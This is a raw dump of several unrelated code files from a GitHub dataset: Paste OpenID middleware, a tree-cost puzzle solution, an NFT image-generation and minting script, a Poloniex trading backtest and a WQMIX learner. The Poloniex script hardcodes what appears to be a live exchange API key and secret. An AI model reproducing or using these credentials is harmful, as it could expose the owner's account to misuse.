app_iter.close()\n redir_url = paste.request.construct_url(environ, with_path_info=False,\n with_query_string=False)\n exc = httpexceptions.HTTPTemporaryRedirect(redir_url)\n return exc.wsgi_application(environ, start_response)\n else:\n return app_iter\n\n def do_verify(self, request):\n \"\"\"Process the form submission, initating OpenID verification.\n \"\"\"\n\n # First, make sure that the user entered something\n openid_url = request['query'].get('openid_url')\n if not openid_url:\n return self.render(request, 'Enter an identity URL to verify.',\n css_class='error', form_contents=openid_url)\n\n oidconsumer = self.oidconsumer\n\n # Then, ask the library to begin the authorization.\n # Here we find out the identity server that will verify the\n # user's identity, and get a token that allows us to\n # communicate securely with the identity server.\n status, info = oidconsumer.beginAuth(openid_url)\n\n # If the URL was unusable (either because of network\n # conditions, a server error, or that the response returned\n # was not an OpenID identity page), the library will return\n # an error code. Let the user know that that URL is unusable.\n if status in [consumer.HTTP_FAILURE, consumer.PARSE_ERROR]:\n if status == consumer.HTTP_FAILURE:\n fmt = 'Failed to retrieve %s'\n else:\n fmt = 'Could not find OpenID information in %s'\n\n message = fmt % (cgi.escape(openid_url),)\n return self.render(request, message, css_class='error', form_contents=openid_url)\n elif status == consumer.SUCCESS:\n # The URL was a valid identity URL. Now we construct a URL\n # that will get us to process the server response. We will\n # need the token from the beginAuth call when processing\n # the response. A cookie or a session object could be used\n # to accomplish this, but for simplicity here we just add\n # it as a query parameter of the return-to URL.\n return_to = self.build_url(request, 'process', token=info.token)\n\n # Now ask the library for the URL to redirect the user to\n # his OpenID server. It is required for security that the\n # return_to URL must be under the specified trust_root. We\n # just use the base_url for this server as a trust root.\n redirect_url = oidconsumer.constructRedirect(\n info, return_to, trust_root=request['base_url'])\n\n # Send the redirect response\n return self.redirect(request, redirect_url)\n else:\n assert False, 'Not reached'\n\n def do_process(self, request):\n \"\"\"Handle the redirect from the OpenID server.\n \"\"\"\n oidconsumer = self.oidconsumer\n\n # retrieve the token from the environment (in this case, the URL)\n token = request['query'].get('token', '')\n\n # Ask the library to check the response that the server sent\n # us. Status is a code indicating the response type. info is\n # either None or a string containing more information about\n # the return type.\n status, info = oidconsumer.completeAuth(token, request['query'])\n\n css_class = 'error'\n openid_url = None\n if status == consumer.FAILURE and info:\n # In the case of failure, if info is non-None, it is the\n # URL that we were verifying. We include it in the error\n # message to help the user figure out what happened.\n openid_url = info\n fmt = \"Verification of %s failed.\"\n message = fmt % (cgi.escape(openid_url),)\n elif status == consumer.SUCCESS:\n # Success means that the transaction completed without\n # error. If info is None, it means that the user cancelled\n # the verification.\n css_class = 'alert'\n if info:\n # This is a successful verification attempt. 
If this\n # was a real application, we would do our login,\n # comment posting, etc. here.\n openid_url = info\n if self.url_to_username:\n username = self.url_to_username(request['environ'], openid_url)\n else:\n username = openid_url\n if 'paste.auth_tkt.set_user' in request['environ']:\n request['environ']['paste.auth_tkt.set_user'](username)\n if not self.login_redirect:\n fmt = (\"If you had supplied a login redirect path, you would have \"\n \"been redirected there. \"\n \"You have successfully verified %s as your identity.\")\n message = fmt % (cgi.escape(openid_url),)\n else:\n # @@: This stuff doesn't make sense to me; why not a remote redirect?\n request['environ']['paste.auth.open_id'] = openid_url\n request['environ']['PATH_INFO'] = self.login_redirect\n return self.app(request['environ'], request['start'])\n #exc = httpexceptions.HTTPTemporaryRedirect(self.login_redirect)\n #return exc.wsgi_application(request['environ'], request['start'])\n else:\n # cancelled\n message = 'Verification cancelled'\n else:\n # Either we don't understand the code or there is no\n # openid_url included with the error. Give a generic\n # failure message. The library should supply debug\n # information in a log.\n message = 'Verification failed.'\n\n return self.render(request, message, css_class, openid_url)\n\n def build_url(self, request, action, **query):\n \"\"\"Build a URL relative to the server base_url, with the given\n query parameters added.\"\"\"\n base = urlparse.urljoin(request['base_url'], self.auth_prefix + '/' + action)\n return appendArgs(base, query)\n\n def redirect(self, request, redirect_url):\n \"\"\"Send a redirect response to the given URL to the browser.\"\"\"\n response_headers = [('Content-type', 'text/plain'),\n ('Location', redirect_url)]\n request['start']('302 REDIRECT', response_headers)\n return [\"Redirecting to %s\" % redirect_url]\n\n def not_found(self, request):\n \"\"\"Render a page with a 404 return code and a message.\"\"\"\n fmt = 'The path %s was not understood by this server.'\n msg = fmt % (request['parsed_uri'],)\n openid_url = request['query'].get('openid_url')\n return self.render(request, msg, 'error', openid_url, status='404 Not Found')\n\n def render(self, request, message=None, css_class='alert', form_contents=None,\n status='200 OK', title=\"Python OpenID Consumer\"):\n \"\"\"Render a page.\"\"\"\n response_headers = [('Content-type', 'text/html')]\n request['start'](str(status), response_headers)\n\n self.page_header(request, title)\n if message:\n request['body'].append(\"
\" % (css_class,))\n request['body'].append(message)\n request['body'].append(\"
\")\n self.page_footer(request, form_contents)\n return request['body']\n\n def page_header(self, request, title):\n \"\"\"Render the page header\"\"\"\n request['body'].append('''\\\n\n %s\n \n \n

%s

\n

\n This example consumer uses the Python OpenID library. It\n just verifies that the URL that you enter is your identity URL.\n

\n''' % (title, title))\n\n def page_footer(self, request, form_contents):\n \"\"\"Render the page footer\"\"\"\n if not form_contents:\n form_contents = ''\n\n request['body'].append('''\\\n
\n
\n Identity URL:\n \n \n \n
\n \n\n''' % (quoteattr(self.build_url(request, 'verify')), quoteattr(form_contents)))\n\n\nmiddleware = AuthOpenIDHandler\n\ndef make_open_id_middleware(\n app,\n global_conf,\n # Should this default to something, or inherit something from global_conf?:\n data_store_path,\n auth_prefix='/oid',\n login_redirect=None,\n catch_401=False,\n url_to_username=None,\n apply_auth_tkt=False,\n auth_tkt_logout_path=None):\n from paste.deploy.converters import asbool\n from paste.util import import_string\n catch_401 = asbool(catch_401)\n if url_to_username and isinstance(url_to_username, six.string_types):\n url_to_username = import_string.eval_import(url_to_username)\n apply_auth_tkt = asbool(apply_auth_tkt)\n new_app = AuthOpenIDHandler(\n app, data_store_path=data_store_path, auth_prefix=auth_prefix,\n login_redirect=login_redirect, catch_401=catch_401,\n url_to_username=url_to_username or None)\n if apply_auth_tkt:\n from paste.auth import auth_tkt\n new_app = auth_tkt.make_auth_tkt_middleware(\n new_app, global_conf, logout_path=auth_tkt_logout_path)\n return new_app\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/third_party/Paste/paste/auth/open_id.py","file_name":"open_id.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"15864141789","text":"class Solution:\r\n def mctFromLeafValues(self, arr: List[int]) -> int:\r\n res = 0\r\n \r\n while len(arr) >= 2:\r\n minV, idx = sys.maxsize, -1\r\n for i in range(1,len(arr)):\r\n if arr[i] * arr[i-1] < minV:\r\n minV = arr[i] * arr[i-1]\r\n idx = i\r\n res += minV\r\n arr = arr[:idx-1] + [max(arr[idx-1], arr[idx])] + arr[idx+1:]\r\n \r\n return res\r\n","repo_name":"Jahnavi-Chunduru/-CrackYourInternship","sub_path":"min cost tree from leaf values 136.py","file_name":"min cost tree from leaf values 136.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72693197605","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 30 18:42:22 2021\r\n\r\n@author: Danny1\r\n\r\nhttps://threadreaderapp.com/thread/1408091355105087488.html\r\nwith thanks to @vee for the sharing and inspiration\r\nand @squeebo for code review (it was even worse before)\r\n\r\n\"\"\"\r\n\r\n\r\nfrom __future__ import print_function\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom PIL import Image, ImageSequence\r\nimport os\r\nimport ast\r\nimport json\r\n\r\nimport keystore as k # create keystore.py fetching all api and metamask keys\r\n\r\n\r\npaths = []\r\n\r\npath = os.path.join(k.ROOT,'opensea_creatures')\r\n\r\n# requires opensea creatures tutorial image folders stored in above path\r\n# additionally add backgrounds (basic filled images of the same size as other files) - or remove lines below\r\n\r\n# set folder paths to images sequencd from background to foreground\r\npaths.append(os.path.join(path,\"img/background/\"))\r\npaths.append(os.path.join(path,\"img/accessory/\"))\r\npaths.append(os.path.join(path,\"img/bases/\"))\r\npaths.append(os.path.join(path,\"img/eyes/\"))\r\npaths.append(os.path.join(path,\"img/mouths/\"))\r\n\r\n# trait names in order of sequence & reused for trait names\r\nlayer = ['background', 'accessory', 'bases', 'eyes', 'mouths']\r\n\r\n# # read folders for .png filenames and create table to set weights\r\n# # only run when traits are updated/added\r\n# # take the csv and create a table containing _ | 
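# --- Editor's aside: a condensed sketch of the weights-table workflow described
# in the comments above -- walk the layer folders, emit one attribute row per
# .png, and default every weight to 1 so the relative weights can then be edited
# by hand. The filename 'weights_template.csv' is illustrative, not from the
# original script.
import os
import pandas as pd

def build_weight_template(img_root, out_csv='weights_template.csv'):
    rows = []
    for folder, _dirs, files in os.walk(img_root):
        layer_name = os.path.basename(folder)
        for fname in files:
            if fname.endswith('.png'):
                # e.g. 'background_blue'; weight 20 appears twice as often as 10
                rows.append({'attribute': '%s_%s' % (layer_name, fname[:-4]), 'weight': 1})
    pd.DataFrame(rows).to_csv(out_csv, index=False)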
weighting\r\n# # example: background_blue | 20 sets a relative weight of 20 to the blue backround\r\n# # (anything weighted 10 will appear half as often while 40 would appear 2x more)\r\n# files = []\r\n# folders = []\r\n\r\n# for (fpath, dirnames, filenames) in os.walk(path + '/img'):\r\n# folders.extend(os.path.join(fpath, name) for name in dirnames)\r\n# files.extend(os.path.join(fpath, name) for name in filenames)\r\n# dataframe = pd.DataFrame(files)\r\n# dataframe = dataframe[dataframe[0].str.endswith('.png')]\r\n# dataframe.to_csv(path + \"\\data1.csv\")\r\n\r\n# load images from folders\r\nlayers = [[]]\r\n\r\n# read weights from a table (built in steps above)\r\ndf = pd.read_excel(path + '/weights.xlsx')\r\n\r\n# loop through each folder and get the path to each image file and store with the appropriate trait\r\n# also store a text code 'attribute' used for testing uniqueness later\r\n# and json dictionary 'trait used to build the metadata file\r\nfor i in range(len(paths)):\r\n files = os.listdir(paths[i])\r\n layers.append([])\r\n for img_name in files:\r\n layers[i].append([(paths[i] + img_name),img_name.replace(\".png\",\"\")])\r\n layers[i] = pd.DataFrame(layers[i], columns = ['image',layer[i]])\r\n layers[i]['attribute'] = layer[i] + '_' + layers[i][layer[i]]\r\n layers[i]['trait'] = '{\\'' + layer[i] + '\\': \\'' + layers[i][layer[i]] + '\\'}'\r\n layers[i] = layers[i].merge(df, how='left', on='attribute')\r\nlayers.pop(len(paths))\r\n \r\n# loop through desired number mint generations\r\n\r\nmint_IDs = []\r\nminted_dicts = []\r\nminted_pngs = []\r\n\r\nwhile (len(mint_IDs) < 5):\r\n \r\n rand_img = []\r\n test_mint = mint_IDs.copy()\r\n\r\n # select random components\r\n r_code = ''\r\n r_dict = {}\r\n\r\n for i in range(len(paths)):\r\n rand_img.append(layers[i].sample(n=1, weights = layers[i]['weight']))\r\n r_code = r_code + '__' + rand_img[i]['attribute'].iloc[0]\r\n r_dict.update(ast.literal_eval(rand_img[i]['trait'].iloc[0]))\r\n \r\n # verify selected combination is not a duplicate (restart if duplicate combo)\r\n \r\n test_mint.append(r_code)\r\n flag = len(set(test_mint)) == len(test_mint)\r\n if (flag):\r\n mint_IDs = test_mint.copy()\r\n minted_dicts.append(r_dict)\r\n else:\r\n continue\r\n \r\n # convert/store valid images\r\n \r\n img_build = []\r\n \r\n for i in range(len(rand_img)):\r\n img_build.append(Image.open(rand_img[i]['image'].iloc[0]))\r\n img_build[i] = img_build[i].convert('RGBA')\r\n \r\n # generate randomly selected image\r\n \r\n new_img = img_build[0]\r\n \r\n for i in range (len(rand_img)):\r\n new_img = Image.alpha_composite(new_img, img_build[i])\r\n \r\n # store local paths for ipfs upload\r\n minted_pngs.append(path + \"/output/mint\" + str(len(mint_IDs)).zfill(3)+'.png')\r\n \r\n new_img.save(minted_pngs[len(mint_IDs)-1])\r\n \r\n \r\n # new_img.show()\r\n\r\n\r\n'''\r\n#######################################\r\n\r\n# SELECT ANIMATION\r\n# ASSEMBLE ANIMATION FRAMES\r\n\r\n#######################################\r\n'''\r\n\r\n # incomplete, but contains steps to add in animation behind each image\r\n \r\n # transparent_foreground = new_img\r\n # # transparent_foreground.show()\r\n # animation = Image.open(path + '\\\\img\\\\animated.png')\r\n # # animation.show()\r\n \r\n # frames = []\r\n # for frame in ImageSequence.Iterator(animation):\r\n # frame = frame.copy()\r\n # frame = frame.convert('RGBA')\r\n # frame = frame.resize(transparent_foreground.size)\r\n # frame = Image.alpha_composite(frame,transparent_foreground)\r\n # # 
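# --- Editor's aside: the heart of the generation loop above in isolation --
# one weighted draw per layer with DataFrame.sample, then the concatenated
# attribute code is used to reject duplicate trait combinations. layer_tables
# stands in for the `layers` list built above; not part of the original script.
def draw_unique_combo(layer_tables, seen_codes):
    picks = [t.sample(n=1, weights=t['weight']).iloc[0] for t in layer_tables]
    code = '__'.join(p['attribute'] for p in picks)
    if code in seen_codes:
        return None  # duplicate combination -- caller retries the draw
    seen_codes.add(code)
    return picks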
frame.paste(transparent_foreground, transparent_foreground)\r\n # frames.append(frame)\r\n # frames[0].save(path + '\\\\output\\\\mint'+str(len(mint_IDs)).zfill(3)+'.png', save_all=True, append_images=frames[1:])\r\n\r\n'''\r\n#######################################\r\n#######################################\r\n\r\n# POST Image Files to IPFS\r\n\r\n#######################################\r\n'''\r\n\r\nimport requests\r\nimport json\r\n\r\npinata = 'https://api.pinata.cloud'\r\n\r\nheaders = {\r\n \"pinata_api_key\": k.PIN_KEY,\r\n \"pinata_secret_api_key\": k.PIN_SECRET,\r\n }\r\n\r\nr_hashes = []\r\n\r\nfor i in minted_pngs:\r\n file = {\"file\":open(i,'rb')}\r\n # upload & pin file to IPFS, receive hash\r\n response = requests.post(pinata + '/pinning/pinFileToIPFS', files = file, headers = headers)\r\n r_hashes.append(response.json()['IpfsHash'])\r\n \r\n \r\n\r\n'''\r\n#######################################\r\n#######################################\r\n\r\n# Add Images to JSON & Upload to IPFS\r\n\r\n#######################################\r\n'''\r\n\r\n\r\n# update dictionaries to json\r\nminted_json = minted_dicts.copy()\r\nr_json_hashes = []\r\n\r\nfor i in range(len(minted_json)):\r\n # set item details\r\n desc = 'Opensea Creatures testing'\r\n image = 'ipfs://' + r_hashes[i]\r\n name = 'creature' + str(i+1).zfill(2)\r\n\r\n attributes = []\r\n for x, y in minted_json[i].items():\r\n if x == 'lines':\r\n continue\r\n attributes.append({\"trait_type\": x, \"value\": y})\r\n \r\n # minted_json[i] = json.dumps(minted_json[i])\r\n # minted_json[i] = json.loads('{ \"description\":' + desc + ', \"name\":' + name + ', \"image\":' + image + ', \"attributes\":' + json.dumps(attributes) + '}')\r\n minted_json[i] = {\"description\": desc, \"name\": name, \"image\": image,\"attributes\": attributes}\r\n # minted_json[i] = json.dumps( minted_json[i] )\r\n \r\n # minted_json[i] = json.loads('{ \"description\":' + desc + ', \"name\":' + name + ', \"attributes\":' + json.dumps(attributes) + '}')\r\n with open(path + '\\\\output\\\\mint' + str(i+1).zfill(3) + '.json', 'w') as f:\r\n json.dump(minted_json[i], f)\r\n \r\n # upload & pin file to IPFS, receive hash\r\n response = requests.post(pinata + '/pinning/pinJSONToIPFS', json = minted_json[i], headers = headers)\r\n \r\n r_json_hashes.append(response.json()['IpfsHash'])\r\n\r\n\r\n \r\n\r\n'''\r\n#######################################\r\n#######################################\r\n\r\n# Confirm Uploads and Compute Collection Hash for Provenance\r\n\r\n#######################################\r\n'''\r\n\r\n# TO DO confirm uploads\r\n\r\n\r\n# Python program to find SHA256 hash string of a file\r\nimport hashlib\r\n\r\nprov = ''\r\n\r\nfor filename in minted_pngs:\r\n sha256_hash = hashlib.sha256()\r\n with open(filename,\"rb\") as f:\r\n # Read and update hash string value in blocks of 4K\r\n for byte_block in iter(lambda: f.read(4096),b\"\"):\r\n sha256_hash.update(byte_block)\r\n prov = prov + sha256_hash.hexdigest()\r\n \r\nprov = hashlib.sha256(prov.encode('utf-8')).hexdigest()\r\n\r\n\r\n\r\n'''\r\n#######################################\r\n#######################################\r\n# MINT!!!\r\n#######################################\r\n'''\r\n\r\nimport json\r\nimport os\r\nimport time\r\n\r\nimport requests\r\nfrom web3 import Web3\r\n\r\n\r\npath = os.path.join(k.ROOT,'contracts/seaABI.json')\r\n\r\nwith open(path, 'r') as myfile:\r\n data=myfile.read()\r\n\r\nABI = data\r\n\r\n# connect to provider\r\nw3 = 
Web3(Web3.HTTPProvider(k.ALCH_KEY))\r\n\r\n# set account to owner\r\nowner = k.OWNER\r\nw3.eth.defaultAccount = owner\r\n\r\n# connect to contract\r\ncontract = w3.eth.contract(address = k.CONTRACT, abi = ABI)\r\n\r\n# check contract symbol\r\ncontract.functions.symbol().call()\r\n\r\nnonce = w3.eth.get_transaction_count(owner)\r\n\r\n# loop through items to be minted\r\nfor i in r_json_hashes:\r\n\r\n # set award\r\n receiver = owner\r\n r_hash = i\r\n award = {receiver, r_hash, 'ipfs://'+r_hash}\r\n \r\n transaction = contract.functions.awardItem(receiver, r_hash, 'ipfs://'+r_hash).buildTransaction()\r\n \r\n transaction.update({\"nonce\": nonce})\r\n \r\n signed_tx = w3.eth.account.sign_transaction(transaction, k.TEST_KEY)\r\n \r\n w3.eth.send_raw_transaction(signed_tx.rawTransaction)\r\n \r\n count = 0\r\n ## TO DO\r\n while nonce == w3.eth.get_transaction_count(receiver) and count < 60:\r\n time.sleep(1)\r\n count = count + 1\r\n # wait until transaction registers\r\n\r\n nonce = w3.eth.get_transaction_count(receiver)","repo_name":"danny-one/nft_Test","sub_path":"generation_v2.py","file_name":"generation_v2.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"29484894829","text":"from poloniex import Poloniex\nfrom time import time\nimport sys\nimport numpy as np\nimport matplotlib.dates as md\nimport matplotlib.pyplot as plt\nimport matplotlib.finance as mpf\nfrom matplotlib.dates import DateFormatter, WeekdayLocator,DayLocator, MONDAY\nfrom colorama import Fore, Back, Style\nfrom datetime import datetime\n\nfrom math import pi\nimport pandas as pd\nfrom bokeh.plotting import figure, output_file, show,save\nfrom bokeh.layouts import column\n\npd.set_option('display.width', 300)\n#print(Fore.RED + 'some red text'+Style.RESET_ALL)\npolo = Poloniex('GBC146G1-M9RGA0VT-T5FL729B-P8OTN6SU',\n'a4d44e8e4e4432e9a9a94d66fb17a7b7081858aaeb85c0fdd9b6ebf8a51a7d2fa0160c5db0e55b8d836ba6d64b1c0e324eba164b94278617edd2eec48c09acb7',jsonNums=float)\ncoin_pair=['BTC_ETH','BTC_XRP','BTC_LTC','BTC_ZEC','BTC_ETC','BTC_DGB','BTC_BTS','BTC_LBC','BTC_FCT','BTC_ARDR','BTC_STRAT','BTC_NXT','BTC_STR','BTC_DASH'\n,'BTC_LSK','BTC_SC','BTC_XEM','BTC_STEEM','BTC_GNT','BTC_XMR','BTC_DOGE','BTC_POT','BTC_SYS','BTC_MAID','BTC_GAME','BTC_BURST','BTC_BCN','BTC_REP','BTC_DCR'\n,'BTC_FLDC','BTC_GRC','BTC_EMC2','BTC_VTC','BTC_GNO','BTC_PINK','BTC_RADS','BTC_AMP','BTC_NOTE','BTC_CLAM','BTC_PPC','BTC_NAV','BTC_OMNI','BTC_VIA','BTC_BLK',\n'BTC_XCP','BTC_XBC','BTC_VRC','BTC_RIC','BTC_PASC','BTC_BTCD','BTC_EXP','BTC_SBD','BTC_SJCX','BTC_NEOS','BTC_FLO','BTC_BELA','BTC_NAUT','BTC_XPM','BTC_NMC',\n'BTC_BCY','BTC_XVC','BTC_BTM','BTC_HUC']\n\nmargin_pair=['BTC_ETH','BTC_XRP','BTC_LTC','BTC_BTS','BTC_STR','BTC_FCT','BTC_DASH','BTC_XMR','BTC_DOGE','BTC_MAID','BTC_CLAM']\n\nperiod = polo.MINUTE * 5\ndf = [pd.DataFrame()]*len(margin_pair)\np=[figure()]*len(margin_pair)\nq=[figure()]*len(margin_pair)\noutput_file(\"polo_chart.html\", title=\"Poloniex-即時k線\")\n\nwindow_short = 3\nwindow_long = 5\nSDP = 0.2\nSDN = -0.6\n# for i in range(len(margin_pair)):\nfor i in range(1):\n print(margin_pair[i])\n df[i]=pd.DataFrame(polo.returnChartData(margin_pair[i],period,time()-polo.DAY))\n df[i]['date'] = df[i]['date']+polo.DAY/3 #shift time to UTC+8\n df[i]['date'] = pd.to_datetime(df[i][\"date\"], unit='s')\n\n\n df[i]['short'] = pd.ewma(df[i]['close'],com= window_short )\n df[i]['long'] = pd.rolling_mean(df[i]['close'], window=window_long)\n 
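# --- Editor's note: pd.ewma and pd.rolling_mean used just above were deprecated
# in pandas 0.18 and removed in later releases; the method-chain equivalents
# compute the same short-EMA / long-SMA pair. Standalone sketch, not part of
# the original script:
def moving_averages(close, window_short=3, window_long=5):
    short = close.ewm(com=window_short).mean()       # replaces pd.ewma(close, com=...)
    slow = close.rolling(window=window_long).mean()  # replaces pd.rolling_mean(close, ...)
    return short, slow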
df[i]['SD']=(df[i].short - df[i].long) / df[i].long * 100\n df[i]['buy'] = df[i]['SD']>SDP\n df[i]['sell'] = df[i]['SD']< SDN\n df[i]['bs'] = df[i].buy != df[i].sell\n trade_index = df[i][df[i]['bs'] == True].index.tolist()\n\n df[i].dropna(inplace=True)\n df[i]['trade'] = pd.DataFrame.diff(df[i].buy[trade_index]*1 + df[i].sell[trade_index]*-1)\n df[i]['trade'].fillna(0,inplace=True)\n df[i]=df[i].drop(['buy','sell','bs'],axis=1)\n print(df[i])\n\n w = (period * 1000) - 5000\n tools = \"pan,wheel_zoom,box_zoom,reset,save,hover\"\n\n p[i] = figure(x_axis_type=\"datetime\", tools=tools, plot_width=1000,plot_height=400, title=margin_pair[i])\n p[i].xaxis.major_label_orientation = pi / 4\n p[i].grid.grid_line_alpha = 2\n inc = df[i].close > df[i].open\n dec = df[i].open > df[i].close\n p[i].segment(df[i].date, df[i].high, df[i].date, df[i].low, color=\"black\")\n\n p[i].vbar(df[i].date[inc], w, df[i].open[inc], df[i].close[inc], fill_color=\"green\", line_color=\"black\")\n p[i].vbar(df[i].date[dec], w, df[i].open[dec], df[i].close[dec], fill_color=\"red\", line_color=\"black\")\n\n p[i].line(df[i].date,df[i].short,color='yellow')\n p[i].line(df[i].date,df[i].long,color='blue')\n trade_index = df[i][df[i]['trade'] ==2].index.tolist()\n p[i].circle(df[i]['date'][trade_index], df[i]['trade'][trade_index]/2*df[i]['weightedAverage'][trade_index]*0.01 +df[i]['weightedAverage'][trade_index] , color='green')\n trade_index = df[i][df[i]['trade'] ==-2].index.tolist()\n p[i].circle(df[i]['date'][trade_index],\n df[i]['trade'][trade_index] / 2 * df[i]['weightedAverage'][trade_index] * 0.01 +\n df[i]['weightedAverage'][trade_index], color='red')\n\ndf_index=df[0].index.tolist()\n\n\nBTC=1\nETH=0\nfee=0\ntrade_time=0\nfor i in df_index:\n if df[0].trade[i] == -2 and ETH>0:\n BTC=ETH*df[0]['close'][i] * 0.9975\n fee = fee + ETH*df[0]['close'][i] * 0.0025\n ETH=0\n trade_time = trade_time + 1\n elif df[0].trade[i] == 2 and BTC>0:\n ETH=BTC/df[0]['close'][i]*0.9975\n fee = fee + BTC * 0.0025\n BTC=0\n trade_time=trade_time+1\nprint(\"BTC %f ETH %f fee %f trade time %f\"%(BTC,ETH,fee,trade_time))\nif ETH>0:\n print(\"Equal BTC %f\"%(ETH * df[0].close[i] * 0.9975))\n#\n# BTC=1\n# BTC_lend=0\n# BTC_Margin=0\n# ETH=0\n# ETH_lend=0\n# ETH_Margin=0\n# trade_time=0\n# fee=0\n# for i in df_index:\n# if df[0].trade[i] == -2: #open Buy Margin && close sell Margin\n# #sell current ETH\n# if BTC_lend >0:\n# BTC_Margin = ETH_Margin * df[0]['close'][i] * 0.9975\n# BTC=BTC_Margin-BTC_lend\n# BTC_Margin = BTC_lend =0\n# #borrow ETH to sell\n# ETH_lend = BTC/df[0]['close'][i] *1.5\n# ETH_Margin = BTC/df[0]['close'][i] *2.5\n# BTC_Margin = ETH_Margin *df[0]['close'][i]*0.9975\n# trade_time=trade_time+1\n# elif df[0].trade[i] == 2:\n# if ETH_lend >0:\n# ETH_Margin = BTC_Margin /df[0]['close'][i] * 0.9975\n# ETH = ETH_Margin -ETH_lend\n# BTC = ETH*df[0]['close'][i]\n# ETH=0\n# BTC_Margin = BTC*2.5\n# BTC_lend = BTC*1.5\n# ETH_Margin = BTC_Margin / df[0]['close'][i] * 0.9975\n# BTC_Margin=0\n#\n# trade_time=trade_time+1\n#\n# print(\"BTC %f\"%BTC)\n# print(\"ETH %f\"%ETH)\n#\n# if ETH>0:\n# print(\"Equal BTC %f\"%(ETH * df[0].close[i] * 0.9975))\n# print(\"Trade time %d\"%trade_time)\n# show(column(p[0]))","repo_name":"notbeloser/Polo_auto_trade","sub_path":"trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17194432955","text":"\"\"\"\nWeighted QMIX\nPaper 
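# --- Editor's note on the 0.9975 factor in the backtest above: each fill keeps
# 1 - 0.0025 of the notional, so a full buy/sell round trip retains
# 0.9975**2 = 0.99500625 (~0.5% cost), which the SDP/SDN entry and exit
# thresholds have to clear before a signal is profitable. Minimal check:
def round_trip_return(entry_price, exit_price, fee=0.0025):
    # units bought with 1 BTC, then BTC received on the sell, fee on both fills
    return (1.0 / entry_price) * (1 - fee) * exit_price * (1 - fee)

assert abs(round_trip_return(100.0, 100.0) - 0.99500625) < 1e-9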
link:\nhttps://proceedings.neurips.cc/paper/2020/file/73a427badebe0e32caa2e1fc7530b7f3-Paper.pdf\nImplementation: Pytorch\nCreator: Wenzhang Liu (liu_wzh@foxmail.com)\n\"\"\"\nfrom xuance_torch.learners import *\n\n\nclass WQMIX_Learner(LearnerMAS):\n def __init__(self,\n config: Namespace,\n policy: nn.Module,\n optimizer: torch.optim.Optimizer,\n scheduler: Optional[torch.optim.lr_scheduler._LRScheduler] = None,\n summary_writer: Optional[SummaryWriter] = None,\n device: Optional[Union[int, str, torch.device]] = None,\n modeldir: str = \"./\",\n gamma: float = 0.99,\n sync_frequency: int = 100\n ):\n self.alpha = config.alpha\n self.gamma = gamma\n self.sync_frequency = sync_frequency\n self.mse_loss = nn.MSELoss()\n super(WQMIX_Learner, self).__init__(config, policy, optimizer, scheduler, summary_writer, device, modeldir)\n\n def update(self, sample):\n self.iterations += 1\n state = torch.Tensor(sample['state']).to(self.device)\n obs = torch.Tensor(sample['obs']).to(self.device)\n actions = torch.Tensor(sample['actions']).to(self.device)\n state_next = torch.Tensor(sample['state_next']).to(self.device)\n obs_next = torch.Tensor(sample['obs_next']).to(self.device)\n rewards = torch.Tensor(sample['rewards']).mean(dim=1).to(self.device)\n terminals = torch.Tensor(sample['terminals']).float().view(-1, self.n_agents, 1).to(self.device)\n agent_mask = torch.Tensor(sample['agent_mask']).float().view(-1, self.n_agents, 1).to(self.device)\n IDs = torch.eye(self.n_agents).unsqueeze(0).expand(self.args.batch_size, -1, -1).to(self.device)\n\n # calculate Q_tot\n _, action_max, q_eval = self.policy(obs, IDs)\n action_max = action_max.unsqueeze(-1)\n q_eval_a = q_eval.gather(-1, actions.long().view([self.args.batch_size, self.n_agents, 1]))\n q_tot_eval = self.policy.Q_tot(q_eval_a * agent_mask, state)\n\n # calculate centralized Q\n q_eval_centralized = self.policy.q_centralized(obs, IDs).gather(-1, action_max.long())\n q_tot_centralized = self.policy.q_feedforward(q_eval_centralized*agent_mask, state)\n\n # calculate y_i\n if self.args.double_q:\n _, action_next_greedy, _ = self.policy(obs_next, IDs)\n action_next_greedy = action_next_greedy.unsqueeze(-1)\n else:\n q_next_eval = self.policy.target_Q(obs_next, IDs)\n action_next_greedy = q_next_eval.argmax(dim=-1, keepdim=True)\n q_eval_next_centralized = self.policy.target_q_centralized(obs_next, IDs).gather(-1, action_next_greedy)\n q_tot_next_centralized = self.policy.target_q_feedforward(q_eval_next_centralized*agent_mask, state_next)\n\n if self.args.consider_terminal_states:\n target_value = rewards + (1 - terminals) * self.args.gamma * q_tot_next_centralized\n else:\n target_value = rewards + self.args.gamma * q_tot_next_centralized\n td_error = q_tot_eval - target_value.detach()\n\n # calculate weights\n ones = torch.ones_like(td_error)\n w = ones * self.alpha\n if self.args.agent == \"CWQMIX\":\n condition_1 = ((action_max == actions.view([-1, self.n_agents, 1])) * agent_mask).all(dim=1)\n condition_2 = target_value > q_tot_centralized\n conditions = condition_1 | condition_2\n w = torch.where(conditions, ones, w)\n elif self.args.agent == \"OWQMIX\":\n condition = td_error < 0\n w = torch.where(condition, ones, w)\n else:\n AttributeError(\"You have assigned an unexpected WQMIX learner!\")\n\n # calculate losses and train\n loss_central = self.mse_loss(q_tot_centralized, target_value.detach())\n loss_qmix = (w.detach() * (td_error ** 2)).mean()\n loss = loss_qmix + loss_central\n self.optimizer.zero_grad()\n loss.backward()\n 
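# --- Editor's aside: the per-sample weighting above, demonstrated on toy
# tensors. In the OWQMIX branch, samples with negative TD error (Q_tot below
# the target) keep weight 1; everything else is down-weighted to alpha.
# Standalone sketch, not part of the learner class:
import torch

alpha = 0.1
td_error = torch.tensor([-0.5, 0.3, -0.1, 0.8])
ones = torch.ones_like(td_error)
w = torch.where(td_error < 0, ones, ones * alpha)
# w -> tensor([1.0000, 0.1000, 1.0000, 0.1000])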
